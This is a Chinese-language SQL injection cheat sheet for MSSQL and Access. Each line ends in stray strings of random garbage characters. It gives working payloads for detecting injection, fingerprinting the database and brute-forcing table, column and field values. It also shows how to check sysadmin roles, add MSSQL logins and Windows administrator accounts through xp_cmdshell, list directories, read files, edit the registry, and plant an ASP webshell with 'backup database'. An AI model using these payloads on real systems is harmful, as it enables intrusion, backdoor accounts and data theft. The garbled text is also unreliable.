1.判断是否有注入;and 1=1 ;and 1=2 p�)Q5fh0-�
2.初步判断是否是mssql ;and user>0 �U�x�^ue9�
{I0!q"s��F
3.注入参数是字符'and [查询条件] and ''=' �&.2�%�p
5G'2 Wby'#
4.搜索时没过滤参数的'and [查询条件] and '%25'=' a(�fiW%eFb
}+`,AC`RM�
5.判断数据库系统 Q:�
-&���
46
0�/eW�\
;and (select count(*) from sysobjects)>0 mssql gGCr~��.5
d^~yU�k���
;and (select count(*) from msysobjects)>0 access
Rq2bj_�j
�R�8�6i2',
n�t&%
sM-X
`%Kj+^|�DS
6.猜数据库 ;and (select Count(*) from [数据库名])>0 yRQ1Szbjli
qh}+b�^W�i
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Z;��+�;_Cw
LdiNXyyzet
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �O�+'k4���
���n87Uf$�
9.(1)猜字段的ascii值(access) �s+ *LVfau
mV"F<G; H�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 v#�g�:�]T�
2\64��~a�^
(2)猜字段的ascii值(mssql) ��R�Fe>#�o
M/�F�<�W�!
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 'Q]W�k7�5
@H�I@�P�Z>
10.测试权限结构(mssql) &u�aSp,�L�
�|O�m]�[�z
hqHk,���#�
uj%]+Llxv�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- KDP��&�I J
�s^)(.�e�_
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- � %>z�G;4
�Oi�C|~8��
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- N1�y,��~Z�
�T�$��FKn�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �Ai 8+U�)�
��.3XSF�$;
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 07(LL�hk@d
{9P(U\]e]k
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �$Sm iN'7;
~k���@{�b&
;and 1=(select IS_MEMBER('db_owner'));-- � �i�SX:H;
ZV5IZ&V��!
t�ycVcr�\(
1 Cz}|�#�U
11.添加mssql和系统的帐户 eUu<q/FUMj
X�H!�n{Of
;exec master.dbo.sp_addlogin username;-- d{�WO�O)�j
;exec master.dbo.sp_password null,username,password;-- $mq�+/|b�n
�MfI+o�<{r
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- SFP?�ND+7�
*fy����aAv
;exec master.dbo.xp_cmdshell 'net user username password $i3`cX)�g�
���b�FA
lC
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- y~t
�e�!C�
�]-heG'y]{
;exec master.dbo.xp_cmdshell 'net user username password /add';-- S �n~P1��C
�9�zB��t
a
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ]�5j>O^c�<
}HbUB$5���
$_a/!)b��P
Xk/:��a}-l
12.(1)遍历目录 j:48l[;ed�
mMu+MXT�k<
;create table dirs(paths varchar(100), id int) I��K4�(r /
�F2�n��4#b
;insert dirs exec master.dbo.xp_dirtree 'c:\' �3$_-� 0>
#�w^Ot*{!N
;and (select top 1 paths from dirs)>0 �_-v$fDr�z
� SBi4i;qD
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �(o\�D=�!a
1]�8H���pd
b'�/�:e#F�
#~�|esr/wf
(2)遍历目录 Ma�c�:E__G
YW�ANBM(v+
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- p����NQ@aJ
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 &�=Y�%4�vq
t0�8�[3Q&
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �aiw�4�J��
jW| �,5,43
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ?^8�.Sa{�
��0+_;�6��
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �4q@[k:�'�
I.2>�d�_^<
8�y?�q)y9h
_$}@hD*�R~
13.mssql中的存储过程 0@&;J�Mh6<
^�d9�o �\�
xp_regenumvalues 注册表根键, 子键 !�.q#X^@>L
wv%�UsfD��
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 0*uJS`se6Z
^zG!Z�:��E
xp_regread 根键,子键,键值名 IMy!8��$\u
m[N&�U��M#
;exec xp_regread q.ppYXJUXi
\w$e|�[�~
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 !83 N#Y_Mz
UrS�%�t>6k
xp_regwrite 根键,子键, 值名, 值类型, 值 ,mD���$h?g
PDh!�B�_�+
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ���2:�[G�4
Sc]h^��B^7
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 @Js@\)P79
F��T gt�$I
xp_regdeletevalue 根键,子键,值名 � �)�Z:maz
MLDAr d�vK
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 Zc9�S[�ivq
e��Q#"-�i�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ���L�Xc;`]
,;=is.h�9
<���z
wI@i
��
�<j��_
14.mssql的backup创建webshell gX5.u9%C\
[s-!t�E3-�
use model b�U4\�Yu
�
1eS@i��hkP
create table cmd(str image); Ei@�al>.�\
|'L$�o�gt6
insert into cmd(str) values (''); 'EU|w,GL}�
8�P�RB_ny�
backup database model to disk='c:\l.asp'; iS�MV�V<7�
B@vup� {Kg
!�ZN"(0#qz
'sjks sy.3
15.mssql内置函数 3"6��-X�_�
BQ!_i*14+�
;and (select @@version)>0 获得Windows的版本号 �61z^(F$@
�z8��P�V&o
;and user_name()='dbo' 判断当前系统的连接用户是不是sa **�n109�R
Q>/[*(�.Wd
;and (select user_name())>0 爆当前系统的连接用户 %�Bk�PkQA�
C�9`��x"�$
;and (select db_name())>0 得到当前连接的数据库 5PK�dMEK|q
�E{B40E�~4
��=��XUt?5
q0��_P�l�*
16.简洁的webshell �wH� qbT�A
SYv5{bff =
use model t�lm�f�DQD
`�?(�9Bl �
create table cmd(str image); 0�4�#r'UIF
�+]#�p�m9�
insert into cmd(str) values (''); e]l.m!,��r
(ZK(ODn�)i
backup database model to disk='g:\wwwtest\l.asp';
